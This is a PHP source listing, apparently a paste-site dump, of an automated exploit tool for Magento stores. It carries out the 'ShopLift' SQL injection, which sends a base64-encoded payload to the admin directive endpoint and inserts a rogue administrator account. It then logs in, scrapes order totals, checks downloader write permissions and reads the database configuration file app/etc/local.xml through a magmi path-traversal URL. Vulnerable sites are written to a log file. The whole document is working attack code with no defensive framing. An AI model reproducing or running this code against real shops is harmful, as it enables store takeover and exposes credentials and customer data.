ha

1. private function LoginDownloader($url){
2. $link = parse_url($url);
3. $data = $this->CurlPost(sprintf("%s://%s/downloader/",$link["scheme"],$link["host"]),
4. array("username" => $this->username,
5. "password" => $this->password)
6. );
7. if(preg_match("/Log Out/i",$data) || (preg_match("/Return to Admin/i",$data))){
8. $permission = (!preg_match("/Warning: Your Magento folder does not have sufficient write permissions./i",$data) ? "Writeable" : "Denied");
9. return "Success\nPermission\t\t: ".$permission;
10. $smtp = (!eregi("Smtp",$data) || !eregi("Mandrill",$data) || !eregi("smtp",$data) ? "Smtp Look" : "Ga Ada Smtp");
11. return "Success\nSmtpPro\t\t: ".$smtp;
12. $filesystem = (!eregi("File_System",$data) ? "File System Ada" : "No");
13. return "Success\nFile system\t\t: ".$filesystem;
14. } else {
15. return "Failed";
16. }
17. }
18.  
19. private function LoginAdmin($target){
20. $link = parse_url($target);
21. $get = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]));
22. $key = $this->GetStr("<input name=\"form_key\" type=\"hidden\" value=\"","\" />",$get);
23. $data = $this->CurlPost(sprintf("%s://%s/admin/",$link["scheme"],$link["host"]),
24. array("login[username]" => $this->username,
25. "login[password]" => $this->password,
26. "form_key" => $key)
27. );
28. if($this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]))){
29. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data)."\nInstaled\t\t:".$this->LocalFileDiscloure(sprintf("%s://%s",$link["scheme"],$link["host"]));
30. } else {
31. return "Success\nOrder Total\t\t: ".$this->GetStr("<span class=\"price\">","</span>",$data);
32. }
33. }
34.  
35. private function ShopLiftExploit($target){
36. $email = substr(md5(time()),2,15);
37. $link = parse_url($target);
38. $data = $this->CurlPost(sprintf("%s://%s/admin/Cms_Wysiwyg/directive/index/",$link["scheme"],$link["host"]),
39. array("filter" => base64_encode("popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);SET @SALT = 'rp';SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{$this->password}') ), CONCAT(':', @SALT ));SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','{$email}@telekpitekwashere.cok','{$this->username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{$this->username}'),'Firstname');"),
40. "___directive" => base64_encode("{{block type=Adminhtml/report_search_grid output=getCsvFile}}"),
41. "forwarded" => "1")
42. );
43. return (@imagecreatefromstring($data) !== false);
44. }
45.  
46. private function ExecuteExploit($victim){
47. $file = fopen("ShopLift-".date("d-m-Y").".log","a");
48. $url = parse_url($victim);
49. $target = (!isset($url["scheme"]) ? "http://".$victim : $url["scheme"]."://".$url["host"]);
50. if($this->ShopLiftExploit($target)){
51. $downloader = $this->LoginDownloader($target);
52. $admin = $this->LoginAdmin($target);
53. $result = "\n============[ShopLift Result]============\nSite\t\t\t: {$target}\nLogin Admin\t\t: {$admin}\nLogin Downloader\t: {$downloader}\n===========================================\n";
54. fwrite($file,$result);
55. return $result;
56. }else {
57. return "[".date("H:i:s")."] ".$target." => Not vuln !\n";
58. }
59.  
60. fclose($file);
61. }
62.  
63.  
64. private function LocalFileDiscloure($target){
65. $path = array( "/app/etc/local.xml",
66. "/magmi/web/download_file.php?file=../../app/etc/local.xml"
67. );
68. for($i=0;$i<=count($path);$i++){
69. $test = $this->CurlPost($target.$path[$i]);
70. if(isset($test) && preg_match('/install/i',$test) && preg_match('/date/i',$test)){
71. return $this->GetStr("<date><![CDATA[","]]></date>",$test);
72. } else {
73. return false;
74. }
75. }
76. }